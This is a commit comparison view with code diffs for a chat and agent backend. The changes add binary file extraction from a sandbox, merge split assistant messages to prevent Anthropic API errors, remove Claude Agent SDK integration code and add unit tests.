Compare commits

..

10 Commits

Author SHA1 Message Date
Bentlybro
99f8bf5f0c fix: skip binary file if stat fails to prevent OOM
If the stat command fails (file deleted, permissions issue, etc.),
we now skip the file rather than proceeding to read it with an
unknown size. This prevents potential OOM crashes from large files
where size verification failed.
2026-02-12 12:32:13 +00:00
Bentlybro
3f76f1318b docs: Fix llm.md to match exact schema description 2026-02-12 12:25:29 +00:00
Bentlybro
b011289dd2 fix: Address code review feedback
- Add 50MB size guard for binary files to prevent OOM
- Extract helper function for path resolution (DRY)
- Add logging for file extraction errors
- Remove dead 'Dockerfile' entry from text_extensions
2026-02-12 12:02:45 +00:00
Bentlybro
49c2f578b4 docs: Update llm.md for binary file support in Claude Code block 2026-02-12 11:58:35 +00:00
Bentlybro
7150b7768d fix: Make Dockerfile check case-insensitive 2026-02-12 11:53:57 +00:00
Bentlybro
8c95b03636 fix: Update tests and address code review feedback
- Update test fixtures with is_binary and content_base64 fields
- Move .svg to text_extensions (it's XML-based)
- Make extension matching case-insensitive for both text and binary
2026-02-12 11:45:52 +00:00
Bentlybro
4a8368887f fix: Use format='bytes' for reading binary files from E2B sandbox
Fixes the critical bug where binary files would fail to read because
files.read() defaults to text mode (UTF-8 decoding). Now explicitly
uses format='bytes' which returns a bytearray.
2026-02-12 11:29:43 +00:00
Bentlybro
d46e5e6b6a docs: Update claude_code.md for binary file support 2026-02-12 11:26:58 +00:00
Bentlybro
4e632bbd60 fix(backend): Extract binary files from ClaudeCodeBlock sandbox
Add support for extracting binary files (PDFs, images, etc.) from the E2B
sandbox in ClaudeCodeBlock.

Changes:
- Add binary_extensions set for common binary file types (.pdf, .png, .jpg, etc.)
- Update FileOutput schema with is_binary and content_base64 fields
- Binary files are read as bytes and base64-encoded before returning
- Text files continue to work as before with is_binary=False

Closes SECRT-1897
2026-02-12 11:23:05 +00:00
Zamil Majdy
a78145505b fix(copilot): merge split assistant messages to prevent Anthropic API errors (#12062)
## Summary
- When the copilot model responds with both text content AND a
long-running tool call (e.g., `create_agent`), the streaming code
created two separate consecutive assistant messages — one with text, one
with `tool_calls`. This caused Anthropic's API to reject with
`"unexpected tool_use_id found in tool_result blocks"` because the
`tool_result` couldn't find a matching `tool_use` in the immediately
preceding assistant message.
- Added a defensive merge of consecutive assistant messages in
`to_openai_messages()` (fixes existing corrupt sessions too)
- Fixed `_yield_tool_call` to add tool_calls to the existing
current-turn assistant message instead of creating a new one
- Changed `accumulated_tool_calls` assignment to use `extend` to prevent
overwriting tool_calls added by long-running tool flow

## Test plan
- [x] All 23 chat feature tests pass (`backend/api/features/chat/`)
- [x] All 44 prompt utility tests pass (`backend/util/prompt_test.py`)
- [x] All pre-commit hooks pass (ruff, isort, black, pyright)
- [ ] Manual test: create an agent via copilot, then ask a follow-up
question — should no longer get 400 error

<!-- greptile_comment -->

<h2>Greptile Overview</h2>

<details><summary><h3>Greptile Summary</h3></summary>

Fixes a critical bug where long-running tool calls (like `create_agent`)
caused Anthropic API 400 errors due to split assistant messages. The fix
ensures tool calls are added to the existing assistant message instead
of creating new ones, and adds a defensive merge function to repair any
existing corrupt sessions.

**Key changes:**
- Added `_merge_consecutive_assistant_messages()` to defensively merge
split assistant messages in `to_openai_messages()`
- Modified `_yield_tool_call()` to append tool calls to the current-turn
assistant message instead of creating a new one
- Changed `accumulated_tool_calls` from assignment to `extend` to
preserve tool calls already added by long-running tool flow

**Impact:** Resolves the issue where users received 400 errors after
creating agents via copilot and asking follow-up questions.
</details>


<details><summary><h3>Confidence Score: 4/5</h3></summary>

- Safe to merge with minor verification recommended
- The changes are well-targeted and solve a real API compatibility
issue. The logic is sound: searching backwards for the current assistant
message is correct, and using `extend` instead of assignment prevents
overwriting. The defensive merge in `to_openai_messages()` also fixes
existing corrupt sessions. All existing tests pass according to the PR
description.
- No files require special attention - changes are localized and
defensive
</details>


<details><summary><h3>Sequence Diagram</h3></summary>

```mermaid
sequenceDiagram
    participant User
    participant StreamAPI as stream_chat_completion
    participant Chunks as _stream_chat_chunks
    participant ToolCall as _yield_tool_call
    participant Session as ChatSession
    
    User->>StreamAPI: Send message
    StreamAPI->>Chunks: Stream chat chunks
    
    alt Text + Long-running tool call
        Chunks->>StreamAPI: Text delta (content)
        StreamAPI->>Session: Append assistant message with content
        Chunks->>ToolCall: Tool call detected
        
        Note over ToolCall: OLD: Created new assistant message<br/>NEW: Appends to existing assistant
        
        ToolCall->>Session: Search backwards for current assistant
        ToolCall->>Session: Append tool_call to existing message
        ToolCall->>Session: Add pending tool result
    end
    
    StreamAPI->>StreamAPI: Merge accumulated_tool_calls
    Note over StreamAPI: Use extend (not assign)<br/>to preserve existing tool_calls
    
    StreamAPI->>Session: to_openai_messages()
    Session->>Session: _merge_consecutive_assistant_messages()
    Note over Session: Defensive: Merges any split<br/>assistant messages
    Session-->>StreamAPI: Merged messages
    
    StreamAPI->>User: Return response
```
</details>


<!-- greptile_other_comments_section -->

<!-- /greptile_comment -->
2026-02-12 01:52:17 +00:00
25 changed files with 490 additions and 3259 deletions

View File

@@ -62,16 +62,12 @@ ENV POETRY_HOME=/opt/poetry \
DEBIAN_FRONTEND=noninteractive DEBIAN_FRONTEND=noninteractive
ENV PATH=/opt/poetry/bin:$PATH ENV PATH=/opt/poetry/bin:$PATH
# Install Python, FFmpeg, ImageMagick, and CLI tools for agent use # Install Python, FFmpeg, and ImageMagick (required for video processing blocks)
# CLI tools match ALLOWED_BASH_COMMANDS in security_hooks.py
RUN apt-get update && apt-get install -y \ RUN apt-get update && apt-get install -y \
python3.13 \ python3.13 \
python3-pip \ python3-pip \
ffmpeg \ ffmpeg \
imagemagick \ imagemagick \
jq \
ripgrep \
tree \
&& rm -rf /var/lib/apt/lists/* && rm -rf /var/lib/apt/lists/*
# Copy only necessary files from builder # Copy only necessary files from builder

View File

@@ -27,11 +27,12 @@ class ChatConfig(BaseSettings):
session_ttl: int = Field(default=43200, description="Session TTL in seconds") session_ttl: int = Field(default=43200, description="Session TTL in seconds")
# Streaming Configuration # Streaming Configuration
stream_timeout: int = Field(default=300, description="Stream timeout in seconds") max_context_messages: int = Field(
max_retries: int = Field( default=50, ge=1, le=200, description="Maximum context messages"
default=3,
description="Max retries for fallback path (SDK handles retries internally)",
) )
stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
max_retries: int = Field(default=3, description="Maximum number of retries")
max_agent_runs: int = Field(default=30, description="Maximum number of agent runs") max_agent_runs: int = Field(default=30, description="Maximum number of agent runs")
max_agent_schedules: int = Field( max_agent_schedules: int = Field(
default=30, description="Maximum number of agent schedules" default=30, description="Maximum number of agent schedules"
@@ -92,17 +93,6 @@ class ChatConfig(BaseSettings):
description="Name of the prompt in Langfuse to fetch", description="Name of the prompt in Langfuse to fetch",
) )
# Claude Agent SDK Configuration
use_claude_agent_sdk: bool = Field(
default=True,
description="Use Claude Agent SDK for chat completions",
)
sdk_max_buffer_size: int = Field(
default=10 * 1024 * 1024, # 10MB (default SDK is 1MB)
description="Max buffer size in bytes for SDK JSON message parsing. "
"Increase if tool outputs exceed the limit.",
)
# Extended thinking configuration for Claude models # Extended thinking configuration for Claude models
thinking_enabled: bool = Field( thinking_enabled: bool = Field(
default=True, default=True,
@@ -148,17 +138,6 @@ class ChatConfig(BaseSettings):
v = os.getenv("CHAT_INTERNAL_API_KEY") v = os.getenv("CHAT_INTERNAL_API_KEY")
return v return v
@field_validator("use_claude_agent_sdk", mode="before")
@classmethod
def get_use_claude_agent_sdk(cls, v):
"""Get use_claude_agent_sdk from environment if not provided."""
# Check environment variable - default to True if not set
env_val = os.getenv("CHAT_USE_CLAUDE_AGENT_SDK", "").lower()
if env_val:
return env_val in ("true", "1", "yes", "on")
# Default to True (SDK enabled by default)
return True if v is None else v
# Prompt paths for different contexts # Prompt paths for different contexts
PROMPT_PATHS: dict[str, str] = { PROMPT_PATHS: dict[str, str] = {
"default": "prompts/chat_system.md", "default": "prompts/chat_system.md",

View File

@@ -2,7 +2,7 @@ import asyncio
import logging import logging
import uuid import uuid
from datetime import UTC, datetime from datetime import UTC, datetime
from typing import Any from typing import Any, cast
from weakref import WeakValueDictionary from weakref import WeakValueDictionary
from openai.types.chat import ( from openai.types.chat import (
@@ -104,6 +104,26 @@ class ChatSession(BaseModel):
successful_agent_runs: dict[str, int] = {} successful_agent_runs: dict[str, int] = {}
successful_agent_schedules: dict[str, int] = {} successful_agent_schedules: dict[str, int] = {}
def add_tool_call_to_current_turn(self, tool_call: dict) -> None:
"""Attach a tool_call to the current turn's assistant message.
Searches backwards for the most recent assistant message (stopping at
any user message boundary). If found, appends the tool_call to it.
Otherwise creates a new assistant message with the tool_call.
"""
for msg in reversed(self.messages):
if msg.role == "user":
break
if msg.role == "assistant":
if not msg.tool_calls:
msg.tool_calls = []
msg.tool_calls.append(tool_call)
return
self.messages.append(
ChatMessage(role="assistant", content="", tool_calls=[tool_call])
)
@staticmethod @staticmethod
def new(user_id: str) -> "ChatSession": def new(user_id: str) -> "ChatSession":
return ChatSession( return ChatSession(
@@ -172,6 +192,47 @@ class ChatSession(BaseModel):
successful_agent_schedules=successful_agent_schedules, successful_agent_schedules=successful_agent_schedules,
) )
@staticmethod
def _merge_consecutive_assistant_messages(
messages: list[ChatCompletionMessageParam],
) -> list[ChatCompletionMessageParam]:
"""Merge consecutive assistant messages into single messages.
Long-running tool flows can create split assistant messages: one with
text content and another with tool_calls. Anthropic's API requires
tool_result blocks to reference a tool_use in the immediately preceding
assistant message, so these splits cause 400 errors via OpenRouter.
"""
if len(messages) < 2:
return messages
result: list[ChatCompletionMessageParam] = [messages[0]]
for msg in messages[1:]:
prev = result[-1]
if prev.get("role") != "assistant" or msg.get("role") != "assistant":
result.append(msg)
continue
prev = cast(ChatCompletionAssistantMessageParam, prev)
curr = cast(ChatCompletionAssistantMessageParam, msg)
curr_content = curr.get("content") or ""
if curr_content:
prev_content = prev.get("content") or ""
prev["content"] = (
f"{prev_content}\n{curr_content}" if prev_content else curr_content
)
curr_tool_calls = curr.get("tool_calls")
if curr_tool_calls:
prev_tool_calls = prev.get("tool_calls")
prev["tool_calls"] = (
list(prev_tool_calls) + list(curr_tool_calls)
if prev_tool_calls
else list(curr_tool_calls)
)
return result
def to_openai_messages(self) -> list[ChatCompletionMessageParam]: def to_openai_messages(self) -> list[ChatCompletionMessageParam]:
messages = [] messages = []
for message in self.messages: for message in self.messages:
@@ -258,7 +319,7 @@ class ChatSession(BaseModel):
name=message.name or "", name=message.name or "",
) )
) )
return messages return self._merge_consecutive_assistant_messages(messages)
async def _get_session_from_cache(session_id: str) -> ChatSession | None: async def _get_session_from_cache(session_id: str) -> ChatSession | None:
@@ -273,8 +334,9 @@ async def _get_session_from_cache(session_id: str) -> ChatSession | None:
try: try:
session = ChatSession.model_validate_json(raw_session) session = ChatSession.model_validate_json(raw_session)
logger.info( logger.info(
f"[CACHE] Loaded session {session_id}: {len(session.messages)} messages, " f"Loading session {session_id} from cache: "
f"last_roles={[m.role for m in session.messages[-3:]]}" # Last 3 roles f"message_count={len(session.messages)}, "
f"roles={[m.role for m in session.messages]}"
) )
return session return session
except Exception as e: except Exception as e:
@@ -316,9 +378,11 @@ async def _get_session_from_db(session_id: str) -> ChatSession | None:
return None return None
messages = prisma_session.Messages messages = prisma_session.Messages
logger.debug( logger.info(
f"[DB] Loaded session {session_id}: {len(messages) if messages else 0} messages, " f"Loading session {session_id} from DB: "
f"roles={[m.role for m in messages[-3:]] if messages else []}" # Last 3 roles f"has_messages={messages is not None}, "
f"message_count={len(messages) if messages else 0}, "
f"roles={[m.role for m in messages] if messages else []}"
) )
return ChatSession.from_db(prisma_session, messages) return ChatSession.from_db(prisma_session, messages)
@@ -369,9 +433,10 @@ async def _save_session_to_db(
"function_call": msg.function_call, "function_call": msg.function_call,
} }
) )
logger.debug( logger.info(
f"[DB] Saving {len(new_messages)} messages to session {session.session_id}, " f"Saving {len(new_messages)} new messages to DB for session {session.session_id}: "
f"roles={[m['role'] for m in messages_data]}" f"roles={[m['role'] for m in messages_data]}, "
f"start_sequence={existing_message_count}"
) )
await chat_db.add_chat_messages_batch( await chat_db.add_chat_messages_batch(
session_id=session.session_id, session_id=session.session_id,
@@ -411,7 +476,7 @@ async def get_chat_session(
logger.warning(f"Unexpected cache error for session {session_id}: {e}") logger.warning(f"Unexpected cache error for session {session_id}: {e}")
# Fall back to database # Fall back to database
logger.debug(f"Session {session_id} not in cache, checking database") logger.info(f"Session {session_id} not in cache, checking database")
session = await _get_session_from_db(session_id) session = await _get_session_from_db(session_id)
if session is None: if session is None:
@@ -428,6 +493,7 @@ async def get_chat_session(
# Cache the session from DB # Cache the session from DB
try: try:
await _cache_session(session) await _cache_session(session)
logger.info(f"Cached session {session_id} from database")
except Exception as e: except Exception as e:
logger.warning(f"Failed to cache session {session_id}: {e}") logger.warning(f"Failed to cache session {session_id}: {e}")
@@ -492,40 +558,6 @@ async def upsert_chat_session(
return session return session
async def append_and_save_message(session_id: str, message: ChatMessage) -> ChatSession:
"""Atomically append a message to a session and persist it.
Acquires the session lock, re-fetches the latest session state,
appends the message, and saves — preventing message loss when
concurrent requests modify the same session.
"""
lock = await _get_session_lock(session_id)
async with lock:
session = await get_chat_session(session_id)
if session is None:
raise ValueError(f"Session {session_id} not found")
session.messages.append(message)
existing_message_count = await chat_db.get_chat_session_message_count(
session_id
)
try:
await _save_session_to_db(session, existing_message_count)
except Exception as e:
raise DatabaseError(
f"Failed to persist message to session {session_id}"
) from e
try:
await _cache_session(session)
except Exception as e:
logger.warning(f"Cache write failed for session {session_id}: {e}")
return session
async def create_chat_session(user_id: str) -> ChatSession: async def create_chat_session(user_id: str) -> ChatSession:
"""Create a new chat session and persist it. """Create a new chat session and persist it.
@@ -632,19 +664,13 @@ async def update_session_title(session_id: str, title: str) -> bool:
logger.warning(f"Session {session_id} not found for title update") logger.warning(f"Session {session_id} not found for title update")
return False return False
# Update title in cache if it exists (instead of invalidating). # Invalidate cache so next fetch gets updated title
# This prevents race conditions where cache invalidation causes
# the frontend to see stale DB data while streaming is still in progress.
try: try:
cached = await _get_session_from_cache(session_id) redis_key = _get_session_cache_key(session_id)
if cached: async_redis = await get_redis_async()
cached.title = title await async_redis.delete(redis_key)
await _cache_session(cached)
except Exception as e: except Exception as e:
# Not critical - title will be correct on next full cache refresh logger.warning(f"Failed to invalidate cache for session {session_id}: {e}")
logger.warning(
f"Failed to update title in cache for session {session_id}: {e}"
)
return True return True
except Exception as e: except Exception as e:

View File

@@ -1,4 +1,16 @@
from typing import cast
import pytest import pytest
from openai.types.chat import (
ChatCompletionAssistantMessageParam,
ChatCompletionMessageParam,
ChatCompletionToolMessageParam,
ChatCompletionUserMessageParam,
)
from openai.types.chat.chat_completion_message_tool_call_param import (
ChatCompletionMessageToolCallParam,
Function,
)
from .model import ( from .model import (
ChatMessage, ChatMessage,
@@ -117,3 +129,205 @@ async def test_chatsession_db_storage(setup_test_user, test_user_id):
loaded.tool_calls is not None loaded.tool_calls is not None
), f"Tool calls missing for {orig.role} message" ), f"Tool calls missing for {orig.role} message"
assert len(orig.tool_calls) == len(loaded.tool_calls) assert len(orig.tool_calls) == len(loaded.tool_calls)
# --------------------------------------------------------------------------- #
# _merge_consecutive_assistant_messages #
# --------------------------------------------------------------------------- #
_tc = ChatCompletionMessageToolCallParam(
id="tc1", type="function", function=Function(name="do_stuff", arguments="{}")
)
_tc2 = ChatCompletionMessageToolCallParam(
id="tc2", type="function", function=Function(name="other", arguments="{}")
)
def test_merge_noop_when_no_consecutive_assistants():
"""Messages without consecutive assistants are returned unchanged."""
msgs = [
ChatCompletionUserMessageParam(role="user", content="hi"),
ChatCompletionAssistantMessageParam(role="assistant", content="hello"),
ChatCompletionUserMessageParam(role="user", content="bye"),
]
merged = ChatSession._merge_consecutive_assistant_messages(msgs)
assert len(merged) == 3
assert [m["role"] for m in merged] == ["user", "assistant", "user"]
def test_merge_splits_text_and_tool_calls():
"""The exact bug scenario: text-only assistant followed by tool_calls-only assistant."""
msgs = [
ChatCompletionUserMessageParam(role="user", content="build agent"),
ChatCompletionAssistantMessageParam(
role="assistant", content="Let me build that"
),
ChatCompletionAssistantMessageParam(
role="assistant", content="", tool_calls=[_tc]
),
ChatCompletionToolMessageParam(role="tool", content="ok", tool_call_id="tc1"),
]
merged = ChatSession._merge_consecutive_assistant_messages(msgs)
assert len(merged) == 3
assert merged[0]["role"] == "user"
assert merged[2]["role"] == "tool"
a = cast(ChatCompletionAssistantMessageParam, merged[1])
assert a["role"] == "assistant"
assert a.get("content") == "Let me build that"
assert a.get("tool_calls") == [_tc]
def test_merge_combines_tool_calls_from_both():
"""Both consecutive assistants have tool_calls — they get merged."""
msgs: list[ChatCompletionAssistantMessageParam] = [
ChatCompletionAssistantMessageParam(
role="assistant", content="text", tool_calls=[_tc]
),
ChatCompletionAssistantMessageParam(
role="assistant", content="", tool_calls=[_tc2]
),
]
merged = ChatSession._merge_consecutive_assistant_messages(msgs) # type: ignore[arg-type]
assert len(merged) == 1
a = cast(ChatCompletionAssistantMessageParam, merged[0])
assert a.get("tool_calls") == [_tc, _tc2]
assert a.get("content") == "text"
def test_merge_three_consecutive_assistants():
"""Three consecutive assistants collapse into one."""
msgs: list[ChatCompletionAssistantMessageParam] = [
ChatCompletionAssistantMessageParam(role="assistant", content="a"),
ChatCompletionAssistantMessageParam(role="assistant", content="b"),
ChatCompletionAssistantMessageParam(
role="assistant", content="", tool_calls=[_tc]
),
]
merged = ChatSession._merge_consecutive_assistant_messages(msgs) # type: ignore[arg-type]
assert len(merged) == 1
a = cast(ChatCompletionAssistantMessageParam, merged[0])
assert a.get("content") == "a\nb"
assert a.get("tool_calls") == [_tc]
def test_merge_empty_and_single_message():
"""Edge cases: empty list and single message."""
assert ChatSession._merge_consecutive_assistant_messages([]) == []
single: list[ChatCompletionMessageParam] = [
ChatCompletionUserMessageParam(role="user", content="hi")
]
assert ChatSession._merge_consecutive_assistant_messages(single) == single
# --------------------------------------------------------------------------- #
# add_tool_call_to_current_turn #
# --------------------------------------------------------------------------- #
_raw_tc = {
"id": "tc1",
"type": "function",
"function": {"name": "f", "arguments": "{}"},
}
_raw_tc2 = {
"id": "tc2",
"type": "function",
"function": {"name": "g", "arguments": "{}"},
}
def test_add_tool_call_appends_to_existing_assistant():
"""When the last assistant is from the current turn, tool_call is added to it."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="user", content="hi"),
ChatMessage(role="assistant", content="working on it"),
]
session.add_tool_call_to_current_turn(_raw_tc)
assert len(session.messages) == 2 # no new message created
assert session.messages[1].tool_calls == [_raw_tc]
def test_add_tool_call_creates_assistant_when_none_exists():
"""When there's no current-turn assistant, a new one is created."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="user", content="hi"),
]
session.add_tool_call_to_current_turn(_raw_tc)
assert len(session.messages) == 2
assert session.messages[1].role == "assistant"
assert session.messages[1].tool_calls == [_raw_tc]
def test_add_tool_call_does_not_cross_user_boundary():
"""A user message acts as a boundary — previous assistant is not modified."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="assistant", content="old turn"),
ChatMessage(role="user", content="new message"),
]
session.add_tool_call_to_current_turn(_raw_tc)
assert len(session.messages) == 3 # new assistant was created
assert session.messages[0].tool_calls is None # old assistant untouched
assert session.messages[2].role == "assistant"
assert session.messages[2].tool_calls == [_raw_tc]
def test_add_tool_call_multiple_times():
"""Multiple long-running tool calls accumulate on the same assistant."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="user", content="hi"),
ChatMessage(role="assistant", content="doing stuff"),
]
session.add_tool_call_to_current_turn(_raw_tc)
# Simulate a pending tool result in between (like _yield_tool_call does)
session.messages.append(
ChatMessage(role="tool", content="pending", tool_call_id="tc1")
)
session.add_tool_call_to_current_turn(_raw_tc2)
assert len(session.messages) == 3 # user, assistant, tool — no extra assistant
assert session.messages[1].tool_calls == [_raw_tc, _raw_tc2]
def test_to_openai_messages_merges_split_assistants():
"""End-to-end: session with split assistants produces valid OpenAI messages."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="user", content="build agent"),
ChatMessage(role="assistant", content="Let me build that"),
ChatMessage(
role="assistant",
content="",
tool_calls=[
{
"id": "tc1",
"type": "function",
"function": {"name": "create_agent", "arguments": "{}"},
}
],
),
ChatMessage(role="tool", content="done", tool_call_id="tc1"),
ChatMessage(role="assistant", content="Saved!"),
ChatMessage(role="user", content="show me an example run"),
]
openai_msgs = session.to_openai_messages()
# The two consecutive assistants at index 1,2 should be merged
roles = [m["role"] for m in openai_msgs]
assert roles == ["user", "assistant", "tool", "assistant", "user"]
# The merged assistant should have both content and tool_calls
merged = cast(ChatCompletionAssistantMessageParam, openai_msgs[1])
assert merged.get("content") == "Let me build that"
tc_list = merged.get("tool_calls")
assert tc_list is not None and len(list(tc_list)) == 1
assert list(tc_list)[0]["id"] == "tc1"

View File

@@ -1,6 +1,5 @@
"""Chat API routes for chat session management and streaming via SSE.""" """Chat API routes for chat session management and streaming via SSE."""
import asyncio
import logging import logging
import uuid as uuid_module import uuid as uuid_module
from collections.abc import AsyncGenerator from collections.abc import AsyncGenerator
@@ -17,16 +16,8 @@ from . import service as chat_service
from . import stream_registry from . import stream_registry
from .completion_handler import process_operation_failure, process_operation_success from .completion_handler import process_operation_failure, process_operation_success
from .config import ChatConfig from .config import ChatConfig
from .model import ( from .model import ChatSession, create_chat_session, get_chat_session, get_user_sessions
ChatMessage, from .response_model import StreamFinish, StreamHeartbeat
ChatSession,
append_and_save_message,
create_chat_session,
get_chat_session,
get_user_sessions,
)
from .response_model import StreamError, StreamFinish, StreamHeartbeat, StreamStart
from .sdk import service as sdk_service
from .tools.models import ( from .tools.models import (
AgentDetailsResponse, AgentDetailsResponse,
AgentOutputResponse, AgentOutputResponse,
@@ -49,7 +40,6 @@ from .tools.models import (
SetupRequirementsResponse, SetupRequirementsResponse,
UnderstandingUpdatedResponse, UnderstandingUpdatedResponse,
) )
from .tracking import track_user_message
config = ChatConfig() config = ChatConfig()
@@ -241,10 +231,6 @@ async def get_session(
active_task, last_message_id = await stream_registry.get_active_task_for_session( active_task, last_message_id = await stream_registry.get_active_task_for_session(
session_id, user_id session_id, user_id
) )
logger.info(
f"[GET_SESSION] session={session_id}, active_task={active_task is not None}, "
f"msg_count={len(messages)}, last_role={messages[-1].get('role') if messages else 'none'}"
)
if active_task: if active_task:
# Filter out the in-progress assistant message from the session response. # Filter out the in-progress assistant message from the session response.
# The client will receive the complete assistant response through the SSE # The client will receive the complete assistant response through the SSE
@@ -314,9 +300,10 @@ async def stream_chat_post(
f"user={user_id}, message_len={len(request.message)}", f"user={user_id}, message_len={len(request.message)}",
extra={"json_fields": log_meta}, extra={"json_fields": log_meta},
) )
session = await _validate_and_get_session(session_id, user_id) session = await _validate_and_get_session(session_id, user_id)
logger.info( logger.info(
f"[TIMING] session validated in {(time.perf_counter() - stream_start_time) * 1000:.1f}ms", f"[TIMING] session validated in {(time.perf_counter() - stream_start_time)*1000:.1f}ms",
extra={ extra={
"json_fields": { "json_fields": {
**log_meta, **log_meta,
@@ -325,25 +312,6 @@ async def stream_chat_post(
}, },
) )
# Atomically append user message to session BEFORE creating task to avoid
# race condition where GET_SESSION sees task as "running" but message isn't
# saved yet. append_and_save_message re-fetches inside a lock to prevent
# message loss from concurrent requests.
if request.message:
message = ChatMessage(
role="user" if request.is_user_message else "assistant",
content=request.message,
)
if request.is_user_message:
track_user_message(
user_id=user_id,
session_id=session_id,
message_length=len(request.message),
)
logger.info(f"[STREAM] Saving user message to session {session_id}")
session = await append_and_save_message(session_id, message)
logger.info(f"[STREAM] User message saved for session {session_id}")
# Create a task in the stream registry for reconnection support # Create a task in the stream registry for reconnection support
task_id = str(uuid_module.uuid4()) task_id = str(uuid_module.uuid4())
operation_id = str(uuid_module.uuid4()) operation_id = str(uuid_module.uuid4())
@@ -359,7 +327,7 @@ async def stream_chat_post(
operation_id=operation_id, operation_id=operation_id,
) )
logger.info( logger.info(
f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start) * 1000:.1f}ms", f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start)*1000:.1f}ms",
extra={ extra={
"json_fields": { "json_fields": {
**log_meta, **log_meta,
@@ -380,43 +348,15 @@ async def stream_chat_post(
first_chunk_time, ttfc = None, None first_chunk_time, ttfc = None, None
chunk_count = 0 chunk_count = 0
try: try:
# Emit a start event with task_id for reconnection async for chunk in chat_service.stream_chat_completion(
start_chunk = StreamStart(messageId=task_id, taskId=task_id)
await stream_registry.publish_chunk(task_id, start_chunk)
logger.info(
f"[TIMING] StreamStart published at {(time_module.perf_counter() - gen_start_time) * 1000:.1f}ms",
extra={
"json_fields": {
**log_meta,
"elapsed_ms": (time_module.perf_counter() - gen_start_time)
* 1000,
}
},
)
# Choose service based on configuration
use_sdk = config.use_claude_agent_sdk
stream_fn = (
sdk_service.stream_chat_completion_sdk
if use_sdk
else chat_service.stream_chat_completion
)
logger.info(
f"[TIMING] Calling {'sdk' if use_sdk else 'standard'} stream_chat_completion",
extra={"json_fields": log_meta},
)
# Pass message=None since we already added it to the session above
async for chunk in stream_fn(
session_id, session_id,
None, # Message already in session request.message,
is_user_message=request.is_user_message, is_user_message=request.is_user_message,
user_id=user_id, user_id=user_id,
session=session, # Pass session with message already added session=session, # Pass pre-fetched session to avoid double-fetch
context=request.context, context=request.context,
_task_id=task_id, # Pass task_id so service emits start with taskId for reconnection
): ):
# Skip duplicate StreamStart — we already published one above
if isinstance(chunk, StreamStart):
continue
chunk_count += 1 chunk_count += 1
if first_chunk_time is None: if first_chunk_time is None:
first_chunk_time = time_module.perf_counter() first_chunk_time = time_module.perf_counter()
@@ -437,7 +377,7 @@ async def stream_chat_post(
gen_end_time = time_module.perf_counter() gen_end_time = time_module.perf_counter()
total_time = (gen_end_time - gen_start_time) * 1000 total_time = (gen_end_time - gen_start_time) * 1000
logger.info( logger.info(
f"[TIMING] run_ai_generation FINISHED in {total_time / 1000:.1f}s; " f"[TIMING] run_ai_generation FINISHED in {total_time/1000:.1f}s; "
f"task={task_id}, session={session_id}, " f"task={task_id}, session={session_id}, "
f"ttfc={ttfc or -1:.2f}s, n_chunks={chunk_count}", f"ttfc={ttfc or -1:.2f}s, n_chunks={chunk_count}",
extra={ extra={
@@ -464,17 +404,6 @@ async def stream_chat_post(
} }
}, },
) )
# Publish a StreamError so the frontend can display an error message
try:
await stream_registry.publish_chunk(
task_id,
StreamError(
errorText="An error occurred. Please try again.",
code="stream_error",
),
)
except Exception:
pass # Best-effort; mark_task_completed will publish StreamFinish
await stream_registry.mark_task_completed(task_id, "failed") await stream_registry.mark_task_completed(task_id, "failed")
# Start the AI generation in a background task # Start the AI generation in a background task
@@ -577,14 +506,8 @@ async def stream_chat_post(
"json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)} "json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}
}, },
) )
# Surface error to frontend so it doesn't appear stuck
yield StreamError(
errorText="An error occurred. Please try again.",
code="stream_error",
).to_sse()
yield StreamFinish().to_sse()
finally: finally:
# Unsubscribe when client disconnects or stream ends # Unsubscribe when client disconnects or stream ends to prevent resource leak
if subscriber_queue is not None: if subscriber_queue is not None:
try: try:
await stream_registry.unsubscribe_from_task( await stream_registry.unsubscribe_from_task(
@@ -828,6 +751,8 @@ async def stream_task(
) )
async def event_generator() -> AsyncGenerator[str, None]: async def event_generator() -> AsyncGenerator[str, None]:
import asyncio
heartbeat_interval = 15.0 # Send heartbeat every 15 seconds heartbeat_interval = 15.0 # Send heartbeat every 15 seconds
try: try:
while True: while True:

View File

@@ -1,14 +0,0 @@
"""Claude Agent SDK integration for CoPilot.
This module provides the integration layer between the Claude Agent SDK
and the existing CoPilot tool system, enabling drop-in replacement of
the current LLM orchestration with the battle-tested Claude Agent SDK.
"""
from .service import stream_chat_completion_sdk
from .tool_adapter import create_copilot_mcp_server
__all__ = [
"stream_chat_completion_sdk",
"create_copilot_mcp_server",
]

View File

@@ -1,354 +0,0 @@
"""Anthropic SDK fallback implementation.
This module provides the fallback streaming implementation using the Anthropic SDK
directly when the Claude Agent SDK is not available.
"""
import json
import logging
import os
import uuid
from collections.abc import AsyncGenerator
from typing import Any, cast
from ..config import ChatConfig
from ..model import ChatMessage, ChatSession
from ..response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
StreamToolInputAvailable,
StreamToolInputStart,
StreamToolOutputAvailable,
StreamUsage,
)
from .tool_adapter import get_tool_definitions, get_tool_handlers
logger = logging.getLogger(__name__)
config = ChatConfig()
# Maximum tool-call iterations before stopping to prevent infinite loops
_MAX_TOOL_ITERATIONS = 10
async def stream_with_anthropic(
session: ChatSession,
system_prompt: str,
text_block_id: str,
) -> AsyncGenerator[StreamBaseResponse, None]:
"""Stream using Anthropic SDK directly with tool calling support.
This function accumulates messages into the session for persistence.
The caller should NOT yield an additional StreamFinish - this function handles it.
"""
import anthropic
# Only use ANTHROPIC_API_KEY - don't fall back to OpenRouter keys
api_key = os.getenv("ANTHROPIC_API_KEY")
if not api_key:
yield StreamError(
errorText="ANTHROPIC_API_KEY not configured for fallback",
code="config_error",
)
yield StreamFinish()
return
client = anthropic.AsyncAnthropic(api_key=api_key)
tool_definitions = get_tool_definitions()
tool_handlers = get_tool_handlers()
anthropic_tools = [
{
"name": t["name"],
"description": t["description"],
"input_schema": t["inputSchema"],
}
for t in tool_definitions
]
anthropic_messages = _convert_session_to_anthropic(session)
if not anthropic_messages or anthropic_messages[-1]["role"] != "user":
anthropic_messages.append(
{"role": "user", "content": "Continue with the task."}
)
